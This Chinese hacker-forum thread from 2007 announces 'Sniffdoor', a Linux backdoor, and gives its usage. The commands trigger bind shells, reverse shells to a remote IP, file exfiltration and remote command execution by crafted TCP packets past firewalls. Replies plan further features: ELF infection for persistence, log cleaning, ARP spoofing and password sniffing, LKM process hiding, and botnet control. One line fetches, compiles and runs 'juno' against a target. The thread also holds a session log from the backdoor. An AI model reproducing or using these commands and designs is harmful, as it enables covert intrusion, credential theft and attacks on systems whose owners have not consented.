[原创]Linux sniffdoor v 1.0
软件作者:wzt <[email]wzt@xsec.org[/email]>信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
[b]注意:文章首发[url=http://www.xsec.org]www.XSec.org[/url],后由原创作者友情提交到邪恶八进制信息安全团队技术论坛,转载请注明首发站点。[/b]
SniffDoor V 1.0 (c) 2007 by wzt <[email]wzt@xsec.org[/email]>
+--------------------------------------------------+
Sniffdoor is a linux backdoor woke up with a special
tcp packet.It can bind a shell with tty,it can send
files with tcp packet,that's means the server side
can sniff your files in the special tcp packets,
and save on its server.The client can send a shell
command with the packet,the server sniff and execute
it,so it can round the firewall.
+--------------------------------------------------+
[USAGE]:
server:
$make;
./sniffdoor
client:
$make;
./sniffclient
sniffdoor <options> [remote_ip] [port] [command]
<options>:
-packet <remote_ip> [port] <command>
-connect <remote ip> <port>
-listen <port>
<command>:
bind:<port>
back:<remote_ip> <port>
file:<filename>
comm:<command>
1. bindshell:
send tcp packet to host 61.155.217.56,and then it
bind a shell on port 999
./client -packet 61.155.217.56 bind:999
./client -packet 61.155.217.56 22 bind:999
port 22 is a active port on the host.
2.connect back door:
1).you server must listen a port first(your ip
is 123.45.64.57):
./client -listen 999
2).send tcp packet to host 61.155.217.56,and then
bind a shell to remote 123.45.64.57 on port 999
./client -packet 61.155.217.56 back:123.45.64.57:999
./client -packet 61.155.217.56 21 back:123.45.64.57:999
3.send file:
1).send file with tcp packet.
./client -packet 61.155.217.56 file:bind.c
./client -packet 61.155.217.56 80 file:bind.c
NOTE!
It can only send txt files , not binary files.
If you fixed up this bug,mail to me,thx.
4.execute command:
1).execute command with tcp packet.
./client -packet 61.155.217.56 comm:"gcc -o bind bind.c"
./client -packet 61.155.217.56 23 comm:"gcc -o bind bind.c"
+-----------------------------------------------------+
[THANKS]:
Thank baozi for testing the door all the time.
[END]:
send any bug to <[email]wzt@xsec.org[/email]>.
-wzt
ps:最近在一个linux下的allinone,大家有什么好想法可以在此讨论下. 有兴趣的回去测试下,给点反馈啊,难道你们看到下面的功能不心动吗?
做一个allinone的渗透型后门,有了这个后门,我们就可以在linux里渗透其他的linux/windows,争取做到一sniffdoor在手,别无他求。
我有如下功能建议,大家多多提出自己的想法,包括大的功能上的和某个功能的某个细节上的,争取弄一个完美的linux渗透型后门。
1:htran with udp support 把windows下的htran移植进来,包括socks5(带用户密码) -->有点难度,比如client 发送 ip pack -proxy -bind eth0 port user pass -->接近完工
2:灵活的回连设置。
3:自动启动 ELF插入启动,注意宿主程序工作是否正常,感染程序名称等等问题。
4:通讯加密
5:portscanner with banner grabber
6:logcleaner -->难度很小,有点必要,呵呵,因为有其他的wipe了,当然,有就最好了
7:arp欺骗+网络sniffer弄进来,可以抓一些明文的密码,如果可以抓smb就超级强了 -->难度一般,比较必要,我觉得可以先把本机sniffer做出来,arp的以后再慢慢加
8:隐藏,隐藏,现在初步打算用fake proc name来忽悠一下,弄成-bash,呵呵,之后做个lkm来隐藏下,最好可以做到动态隐藏。
9:ttysniffer弄进来 -->难度十分之大,但十分必要
10:把client和server整合在一起,精简参数,打包的时候附带cygwin版本,以便在windows里使用。最好可以带上肉鸡管理功能,方便以后批量发送指令,例如wget ip/juno.c;gcc juno.c -o juno ; ./juno [url]www.xxx.com[/url] 80 :)
11:httpd……………多线程………………………auth,port,directory,index,4个参数,呵呵。 10:把client和server整合在一起,精简参数,打包的时候附带cygwin版本,以便在windows里使用。最好可以带上肉鸡管理功能,方便以后批量发送指令,例如wget ip/juno.c;gcc juno.c -o juno ; ./juno [url]www.xxx.com[/url] 80 :) 这么好的东西不定都不行。。。。。。。就等LZ你的拉。。。 [s:269] 好东西收藏了。。。顶
顺便问下。。。可否能做到ELF文件感染。。好像以前看到过一篇文章。不太记得了。。 就是打算使用ELF感染让后门自动启动。
elf感染大致分为两种类型,分别是在elf文件的section部分插入后门文件或者是后门地址。 强烈支持2楼...
几乎出来个black box了.其实整合功能我觉还不错.AO MT那些都不错.什么时候哪个牛淫出来个.
强烈支持SOCKS5... 二楼说得俺心如小鹿乱撞.
上个月因需要请我兄弟写了个linux下的arp工具,效果不是很理想.期待ing wzt,你把htran2.4已经移植到linux下面了,咋没发出来。。。 [root@Loveshell src]# ./sniffclient -connect 10.0.0.64 11
xsecid
COLUMNS=80LINES=25LOGNAME=shitdownUSERNAME=shitdownUSER=shitdownPS1=[\ut@\h \W]\$ HISTFILE=/dev/nullPATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin:./binTERM=vt100
id 现在参数有点复杂
client -listen port
client -packet ip back:61.139.106.156:999 [quote]引用第8楼剑心于2007-06-14 21:00发表的 :
[root@Loveshell src]# ./sniffclient -connect 10.0.0.64 11
xsecid
COLUMNS=80LINES=25LOGNAME=shitdownUSERNAME=shitdownUSER=shitdownPS1=[ut@h W]$ HISTFILE=/dev/nullPATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin:./binTERM=vt100
.......[/quote]
系统版本是什么? 是你的用法错了
./sniffclient -packet ip bind:9999
就会绑定9999端口
./sniffclient -packet ip back:11.22.33.44:9999
就把shell反弹到11.22.33.44的9999端口上
sniffcilent,sniffserver都需要root权限 [quote]引用第1楼perlish于2007-06-12 01:16发表的 :
有兴趣的回去测试下,给点反馈啊,难道你们看到下面的功能不心动吗?
做一个allinone的渗透型后门,有了这个后门,我们就可以在linux里渗透其他的linux/windows,争取做到一sniffdoor在手,别无他求。
我有如下功能建议,大家多多提出自己的想法,包括大的功能上的和某个功能的某个细节上的,争取弄一个完美的linux渗透型后门。
.......[/quote]
报告包子同学,我很心动,决定买下这本书[url=http://www.china-pub.com/computers/common/info.asp?id=33907]Linux程序设计(第3版)[/url]。 貌似没有域名解析功能哦,加个会比较好点
页:
[1]